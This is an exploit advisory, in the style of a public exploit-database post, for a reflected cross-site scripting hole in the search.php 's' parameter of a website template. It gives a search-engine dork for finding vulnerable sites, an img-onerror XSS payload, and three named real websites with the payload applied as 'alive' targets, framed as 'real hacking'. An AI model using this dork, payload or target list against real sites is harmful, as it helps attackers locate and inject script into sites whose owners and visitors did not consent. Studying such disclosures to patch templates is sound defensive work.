# [+] Title : Demo Illustrations by Justin Mezzell reflected XSS
# [+] Author (Discover) : ABDO10
# [+] Date : Jun, 16th 2019 
# [+] Dork : allintext:"Demo Illustrations by Justin Mezzell"

# [+] Poc Instructions : 
        + We have to dork in search engine 
        + we have to set payload on the vulnerable file "search.php" in the parameter "s" 
        + E.g [target]/[path]/search.php?s=<img src="xy"  onError=prompt(document.domain)>
 
# [+] Alive E.g :
        + http://www.plasticosajaco.com/search.php?s=<img src="xy"  onError=prompt(document.domain)>
        + https://nokesolutions.com/samples/codester/search.php?s=<img src="xy"  onError=prompt(document.domain)>
        + http://schoolnepal.org/search.php?s=<img src="xy"  onError=prompt(document.domain)>
           ``... and more ... This the real hacking #ahmed cmd`` 
            `` Greetz Lakarha_Family ``